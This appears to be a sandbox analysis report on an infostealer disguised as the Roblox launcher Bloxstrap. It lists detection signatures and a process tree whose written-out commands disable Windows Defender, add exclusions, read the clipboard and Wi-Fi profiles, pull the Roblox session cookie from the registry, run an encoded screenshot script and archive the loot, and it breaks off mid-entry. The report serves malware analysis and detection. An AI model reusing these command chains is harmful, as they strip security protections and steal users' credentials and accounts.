Resubmissions

12-12-2024 06:44

241212-hht9estmay 10

Analysis

  • max time kernel
    94s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-12-2024 06:44

General

  • Target

    bloxstrap-main/Bloxstrap/Bloxstrap.exe

  • Size

    7.0MB

  • MD5

    3b7e32ec9089d2899e1700030dd837f1

  • SHA1

    247a69ab65ae550ee928484e984f40417df6d5a9

  • SHA256

    cbf6ba0da350dcfcad1e73dbbd838d129ae72e7f90b9138b241e8f0523144d83

  • SHA512

    67acd0040b9cae6d5bdf121f0a1b1aaccc45c832b60ca9c50bf95c10644d0127a49c9e4982a79eeb3a531457ec1bd043ad887446ab61a929f9f1d035eaaa2899

  • SSDEEP

    98304:01ywDjWM8JEE1r9amaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRGYKJJcGhEIR:0110IeNTfm/pf+xk4dWRGtrbWOjgWym

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bloxstrap-main\Bloxstrap\Bloxstrap.exe
    "C:\Users\Admin\AppData\Local\Temp\bloxstrap-main\Bloxstrap\Bloxstrap.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1120
    • C:\Users\Admin\AppData\Local\Temp\bloxstrap-main\Bloxstrap\Bloxstrap.exe
      "C:\Users\Admin\AppData\Local\Temp\bloxstrap-main\Bloxstrap\Bloxstrap.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bloxstrap-main\Bloxstrap\Bloxstrap.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3820
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bloxstrap-main\Bloxstrap\Bloxstrap.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2340
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1140
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4784
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:264
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1424
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4324
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:1960
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3036
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:2696
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1400
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:464
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4848
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:2968
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\bloxstrap-main\Bloxstrap\Bloxstrap.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:3568
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\bloxstrap-main\Bloxstrap\Bloxstrap.exe"
              4⤵
              • Views/modifies file attributes
              PID:4084
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌    .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2116
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌    .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3172
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1476
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:4724
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3628
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:2724
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1068
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
                PID:1584
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Clipboard Data
              PID:4380
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Clipboard Data
                • Suspicious behavior: EnumeratesProcesses
                PID:1144
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4388
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:1288
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              3⤵
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:2828
              • C:\Windows\system32\netsh.exe
                netsh wlan show profile
                4⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Network Configuration Discovery: Wi-Fi Discovery
                PID:1008
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
                PID:4208
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:3672
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "systeminfo"
                  3⤵
                    PID:2396
                    • C:\Windows\system32\systeminfo.exe
                      systeminfo
                      4⤵
                      • Gathers system information
                      PID:468
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                    3⤵
                      PID:2232
                      • C:\Windows\system32\reg.exe
                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        4⤵
                          PID:3384
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                        3⤵
                          PID:2108
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3016
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mtpvk2ce\mtpvk2ce.cmdline"
                              5⤵
                                PID:2752
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA613.tmp" "c:\Users\Admin\AppData\Local\Temp\mtpvk2ce\CSC4CCB33A63CF14A59A4B0AB94E7D4EFC0.TMP"
                                  6⤵
                                    PID:4996
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:3624
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:5004
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:4612
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:400
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                      3⤵
                                        PID:4400
                                        • C:\Windows\system32\attrib.exe
                                          attrib -r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:2376
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:2744
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:2124
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                            3⤵
                                              PID:2788
                                              • C:\Windows\system32\attrib.exe
                                                attrib +r C:\Windows\System32\drivers\etc\hosts
                                                4⤵
                                                • Drops file in Drivers directory
                                                • Views/modifies file attributes
                                                PID:2340
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:4656
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:1884
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  3⤵
                                                    PID:3644
                                                    • C:\Windows\system32\tasklist.exe
                                                      tasklist /FO LIST
                                                      4⤵
                                                      • Enumerates processes with tasklist
                                                      PID:2060
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:2344
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:1688
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                        3⤵
                                                          PID:4744
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            4⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:2128
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          3⤵
                                                            PID:1304
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              4⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:5084
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "getmac"
                                                            3⤵
                                                              PID:5076
                                                              • C:\Windows\system32\getmac.exe
                                                                getmac
                                                                4⤵
                                                                  PID:4804
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI11202\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\Tkbco.zip" *"
                                                                3⤵
                                                                  PID:1568
                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI11202\rar.exe
